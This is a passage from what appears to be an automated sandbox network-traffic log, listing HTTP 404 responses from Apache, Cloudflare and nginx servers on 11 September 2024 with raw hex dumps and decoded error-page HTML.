20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:29 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l232qS49SdojLUekuh%2FJBVEjw2nt63OCqRz4Y1IEYZLsUAryQX2p45V0WS6iFd5wW%2Bs5fmMZCy1FrxZqmyW9FkT1PHNJCtOwHflCZbxOizhzjWz%2Fue7aDglh0VWz9Vy7dya7Lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1693e40ae472a7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsvWIlM4trV5Y%2BZqVpfvd%2FhHbUYPy9y4ovQoz47zHx%2FrfYcn4NnWtAG8HNJhcRZciluubY22hcNb2bC55%2F4JMWfdr2BecV%2FZR1XSBM9IqVWxxfcNgfAvZFRqKbTFqbXKyxn4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1693f3df4a0f4a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2xuLr1TuQ2KLuTF5lPOxB6q4WsqGUKepN5i%2Bre9rDvTrJ%2F%2B%2B7P6vBkiuL0irh%2Bfg5oTzBo%2BsyZIuBRariB4JmadAGwvx5ZZqUUdwdv3eblw4wuC8zvaYLoolDJBln2VpuJMGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c169403db5142f2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnA3NFqTD91MEVzKU3yAG79CS%2FCoHlLlDjcbJ2qwwOFSMBBWCTyU4pcWJS7ZMMDJRrySg7sT10aKma%2FlsLy%2FhwmthjUexifD2nYoDLR7XxJ9PY29Bhfxg6yjWxP9g0Vq5F1uCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c169413c89d41c1-EWRalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
